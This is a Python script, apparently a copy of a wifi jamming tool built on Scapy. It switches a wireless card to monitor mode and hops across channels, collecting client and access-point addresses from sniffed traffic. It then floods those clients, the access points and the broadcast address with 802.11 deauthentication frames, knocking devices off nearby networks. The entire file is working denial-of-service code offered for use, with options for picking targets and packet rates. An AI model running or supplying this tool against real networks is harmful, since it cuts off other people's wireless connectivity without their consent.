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#!/usr/bin/env python
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import logging
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logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up Scapy
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from scapy.all import *
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conf.verb = 0 # Scapy I thought I told you to shut up
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import os
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import sys
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import time
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from threading import Thread, Lock
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from subprocess import Popen, PIPE
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from signal import SIGINT, signal
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import argparse
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import socket
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import struct
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import fcntl
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# Console colors
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W = '\033[0m' # white (normal)
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R = '\033[31m' # red
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G = '\033[32m' # green
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O = '\033[33m' # orange
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B = '\033[34m' # blue
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P = '\033[35m' # purple
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C = '\033[36m' # cyan
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GR = '\033[37m' # gray
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T = '\033[93m' # tan
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def parse_args():
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#Create the arguments
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parser = argparse.ArgumentParser()
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parser.add_argument("-s",
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"--skip",
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help="Skip deauthing this MAC address. \
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Example: -s 00:11:BB:33:44:AA")
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parser.add_argument("-i",
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"--interface",
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help="Choose monitor mode interface. \
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By default script will find the most powerful \
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interface and starts monitor mode on it. \
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Example: -i mon5")
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parser.add_argument("-c",
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"--channel",
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help="Listen on and deauth only clients on the specified channel. \
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Example: -c 6")
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parser.add_argument("-m",
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"--maximum",
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help="Choose the maximum number of clients to deauth. \
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List of clients will be emptied and repopulated \
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after hitting the limit. Example: -m 5")
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parser.add_argument("-n",
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"--noupdate",
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help="Do not clear the deauth list when the maximum (-m) \
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number of client/AP combos is reached. \
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Must be used in conjunction with -m. \
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Example: -m 10 -n",
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action='store_true')
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parser.add_argument("-t",
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"--timeinterval",
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help="Choose the time interval between packets being sent. \
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Default is as fast as possible. \
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If you see scapy errors like 'no buffer space' \
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try: -t .00001")
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parser.add_argument("-p",
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"--packets",
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help="Choose the number of packets to send in each deauth burst. \
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Default value is 1; \
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1 packet to the client and 1 packet to the AP. \
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Send 2 deauth packets to the client \
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and 2 deauth packets to the AP: -p 2")
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parser.add_argument("-d",
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"--directedonly",
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help="Skip the deauthentication packets to the broadcast \
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address of the access points and only send them \
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to client/AP pairs",
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action='store_true')
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parser.add_argument("-a",
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"--accesspoint",
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help="Enter the MAC address of a specific access point to target")
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parser.add_argument("--world",
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help="N. American standard is 11 channels but the rest \
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of the world it's 13 so this options enables the \
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scanning of 13 channels",
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action="store_true")
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return parser.parse_args()
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########################################
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# Begin interface info and manipulation
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########################################
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def get_mon_iface(args):
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global monitor_on
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monitors, interfaces = iwconfig()
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if args.interface:
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monitor_on = True
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return args.interface
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if len(monitors) > 0:
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monitor_on = True
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return monitors[0]
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else:
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# Start monitor mode on a wireless interface
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print '['+G+'*'+W+'] Finding the most powerful interface...'
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interface = get_iface(interfaces)
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monmode = start_mon_mode(interface)
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return monmode
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def iwconfig():
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monitors = []
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interfaces = {}
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try:
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proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
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except OSError:
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sys.exit('['+R+'-'+W+'] Could not execute "iwconfig"')
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for line in proc.communicate()[0].split('\n'):
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if len(line) == 0: continue # Isn't an empty string
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if line[0] != ' ': # Doesn't start with space
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wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
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if not wired_search: # Isn't wired
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iface = line[:line.find(' ')] # is the interface
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if 'Mode:Monitor' in line:
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monitors.append(iface)
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elif 'IEEE 802.11' in line:
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if "ESSID:\"" in line:
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interfaces[iface] = 1
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else:
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interfaces[iface] = 0
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return monitors, interfaces
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def get_iface(interfaces):
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scanned_aps = []
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if len(interfaces) < 1:
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sys.exit('['+R+'-'+W+'] No wireless interfaces found, bring one up and try again')
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if len(interfaces) == 1:
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for interface in interfaces:
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return interface
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# Find most powerful interface
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for iface in interfaces:
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count = 0
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proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN)
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for line in proc.communicate()[0].split('\n'):
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if ' - Address:' in line: # first line in iwlist scan for a new AP
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count += 1
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scanned_aps.append((count, iface))
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print '['+G+'+'+W+'] Networks discovered by '+G+iface+W+': '+T+str(count)+W
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try:
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interface = max(scanned_aps)[1]
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return interface
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except Exception as e:
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for iface in interfaces:
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interface = iface
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print '['+R+'-'+W+'] Minor error:',e
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print ' Starting monitor mode on '+G+interface+W
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return interface
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def start_mon_mode(interface):
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print '['+G+'+'+W+'] Starting monitor mode off '+G+interface+W
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try:
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os.system('ifconfig %s down' % interface)
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os.system('iwconfig %s mode monitor' % interface)
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os.system('ifconfig %s up' % interface)
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return interface
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except Exception:
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sys.exit('['+R+'-'+W+'] Could not start monitor mode')
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def remove_mon_iface(mon_iface):
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os.system('ifconfig %s down' % mon_iface)
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os.system('iwconfig %s mode managed' % mon_iface)
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os.system('ifconfig %s up' % mon_iface)
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def mon_mac(mon_iface):
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'''
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http://stackoverflow.com/questions/159137/getting-mac-address
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'''
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s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
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info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
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mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
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print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
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return mac
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########################################
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# End of interface info and manipulation
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########################################
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def channel_hop(mon_iface, args):
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'''
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First time it runs through the channels it stays on each channel for 5 seconds
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in order to populate the deauth list nicely. After that it goes as fast as it can
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'''
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global monchannel, first_pass
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channelNum = 0
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maxChan = 11 if not args.world else 13
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err = None
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while 1:
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if args.channel:
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with lock:
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monchannel = args.channel
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else:
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channelNum +=1
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if channelNum > maxChan:
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channelNum = 1
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with lock:
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first_pass = 0
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with lock:
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monchannel = str(channelNum)
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try:
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proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
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except OSError:
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print '['+R+'-'+W+'] Could not execute "iw"'
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os.kill(os.getpid(),SIGINT)
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sys.exit(1)
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for line in proc.communicate()[1].split('\n'):
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if len(line) > 2: # iw dev shouldnt display output unless there's an error
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err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W
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output(err, monchannel)
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if args.channel:
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time.sleep(.05)
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else:
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# For the first channel hop thru, do not deauth
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if first_pass == 1:
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time.sleep(1)
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continue
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deauth(monchannel)
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def deauth(monchannel):
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'''
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addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
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multi-APs to one gateway. Constantly scans the clients_APs list and
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starts a thread to deauth each instance
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'''
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pkts = []
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if len(clients_APs) > 0:
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with lock:
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for x in clients_APs:
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client = x[0]
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ap = x[1]
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ch = x[2]
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# Can't add a RadioTap() layer as the first layer or it's a malformed
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# Association request packet?
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# Append the packets to a new list so we don't have to hog the lock
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# type=0, subtype=12?
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if ch == monchannel:
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deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
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deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
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pkts.append(deauth_pkt1)
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pkts.append(deauth_pkt2)
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if len(APs) > 0:
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if not args.directedonly:
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with lock:
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for a in APs:
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ap = a[0]
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ch = a[1]
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if ch == monchannel:
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deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth()
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pkts.append(deauth_ap)
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if len(pkts) > 0:
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# prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
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if not args.timeinterval:
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args.timeinterval = 0
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if not args.packets:
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args.packets = 1
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for p in pkts:
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send(p, inter=float(args.timeinterval), count=int(args.packets))
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def output(err, monchannel):
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os.system('clear')
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if err:
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print err
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else:
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print '['+G+'+'+W+'] '+mon_iface+' channel: '+G+monchannel+W+'\n'
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if len(clients_APs) > 0:
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print ' Deauthing ch ESSID'
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# Print the deauth list
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with lock:
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for ca in clients_APs:
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if len(ca) > 3:
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print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W
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else:
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print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2]
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if len(APs) > 0:
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print '\n Access Points ch ESSID'
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with lock:
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for ap in APs:
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print '['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W
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print ''
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def noise_filter(skip, addr1, addr2):
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# Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast
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ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
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if skip:
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ignore.append(skip)
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for i in ignore:
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if i in addr1 or i in addr2:
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return True
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def cb(pkt):
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'''
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Look for dot11 packets that aren't to or from broadcast address,
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are type 1 or 2 (control, data), and append the addr1 and addr2
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to the list of deauth targets.
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'''
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global clients_APs, APs
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# return these if's keeping clients_APs the same or just reset clients_APs?
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# I like the idea of the tool repopulating the variable more
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if args.maximum:
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if args.noupdate:
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if len(clients_APs) > int(args.maximum):
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return
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else:
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if len(clients_APs) > int(args.maximum):
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with lock:
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clients_APs = []
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APs = []
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# We're adding the AP and channel to the deauth list at time of creation rather
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# than updating on the fly in order to avoid costly for loops that require a lock
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if pkt.haslayer(Dot11):
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if pkt.addr1 and pkt.addr2:
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pkt.addr1 = pkt.addr1.lower()
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pkt.addr2 = pkt.addr2.lower()
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# Filter out all other APs and clients if asked
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if args.accesspoint:
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if args.accesspoint.lower() not in [pkt.addr1, pkt.addr2]:
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return
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if args.skip:
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if args.skip.lower() == pkt.addr2:
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return
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# Check if it's added to our AP list
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if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
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APs_add(clients_APs, APs, pkt, args.channel, args.world)
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# Ignore all the noisy packets like spanning tree
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#if noise_filter(skip, pkt.addr1, pkt.addr2):
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# return
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# Management = 1, data = 2
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if pkt.type in [1, 2]:
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clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
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def APs_add(clients_APs, APs, pkt, chan_arg, world_arg):
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ssid = pkt[Dot11Elt].info
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bssid = pkt[Dot11].addr3.lower()
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try:
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# Thanks to airoscapy for below
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ap_channel = str(ord(pkt[Dot11Elt:3].info))
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chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11'] if not args.world else ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13']
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if ap_channel not in chans:
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return
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if chan_arg:
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if ap_channel != chan_arg:
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return
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except Exception as e:
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return
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if len(APs) == 0:
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with lock:
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return APs.append([bssid, ap_channel, ssid])
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else:
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for b in APs:
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if bssid in b[0]:
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return
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with lock:
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return APs.append([bssid, ap_channel, ssid])
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def clients_APs_add(clients_APs, addr1, addr2):
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if len(clients_APs) == 0:
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if len(APs) == 0:
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with lock:
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return clients_APs.append([addr1, addr2, monchannel])
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else:
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AP_check(addr1, addr2)
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# Append new clients/APs if they're not in the list
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else:
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for ca in clients_APs:
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if addr1 in ca and addr2 in ca:
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return
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if len(APs) > 0:
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return AP_check(addr1, addr2)
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else:
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with lock:
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return clients_APs.append([addr1, addr2, monchannel])
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def AP_check(addr1, addr2):
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for ap in APs:
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if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
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with lock:
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return clients_APs.append([addr1, addr2, ap[1], ap[2]])
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def stop(signal, frame):
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if monitor_on:
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sys.exit('\n['+R+'!'+W+'] Closing')
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else:
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remove_mon_iface(mon_iface)
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os.system('service network-manager restart')
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sys.exit('\n['+R+'!'+W+'] Closing')
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if __name__ == "__main__":
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if os.geteuid():
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sys.exit('['+R+'-'+W+'] Please run as root')
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clients_APs = []
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APs = []
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DN = open(os.devnull, 'w')
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lock = Lock()
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args = parse_args()
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monitor_on = None
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mon_iface = get_mon_iface(args)
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conf.iface = mon_iface
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mon_MAC = mon_mac(mon_iface)
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first_pass = 1
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# Start channel hopping
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hop = Thread(target=channel_hop, args=(mon_iface, args))
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hop.daemon = True
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hop.start()
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signal(SIGINT, stop)
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try:
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sniff(iface=mon_iface, store=0, prn=cb)
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except Exception as msg:
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remove_mon_iface(mon_iface)
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os.system('service network-manager restart')
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print '\n['+R+'!'+W+'] Closing'
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sys.exit(0)
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